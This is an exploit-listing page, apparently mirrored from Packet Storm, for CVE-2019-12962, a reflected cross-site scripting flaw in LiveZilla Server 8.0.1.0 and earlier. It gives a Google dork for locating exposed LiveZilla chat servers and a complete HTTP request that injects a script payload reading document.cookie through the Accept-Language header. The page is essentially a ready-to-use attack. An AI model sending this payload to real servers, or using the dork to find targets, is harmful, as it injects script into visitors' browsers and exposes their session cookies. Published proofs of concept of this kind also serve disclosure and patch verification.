Exploit for LiveZilla Server 8.0.1.0 Cross Site Scripting CVE-2019-12962

Name: Exploit for LiveZilla Server 8.0.1.0 Cross Site Scripting CVE-2019-12962
Rating: 5 (163 reviews)

2021-03-19 | CVSS 4.3

## https://sploitus.com/exploit?id=PACKETSTORM:161867
# Exploit Title: LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS  
# Google Dork: inurl: inurl:/mobile/index.php intitle:LiveZilla  
# Date: 18 Mars 2021  
# Exploit Author: Clément Cruchet  
# Vendor Homepage: https://www.livezilla.net  
# Software Link: https://www.livezilla.net/downloads/en/  
# Version: LiveZilla Server 8.0.1.0 and before  
# Tested on: Windows/Linux  
# CVE : CVE-2019-12962  
  
GET /mobile/index.php HTTP/1.1  
Host: chat.website.com  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: ';alert(document.cookie)//  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1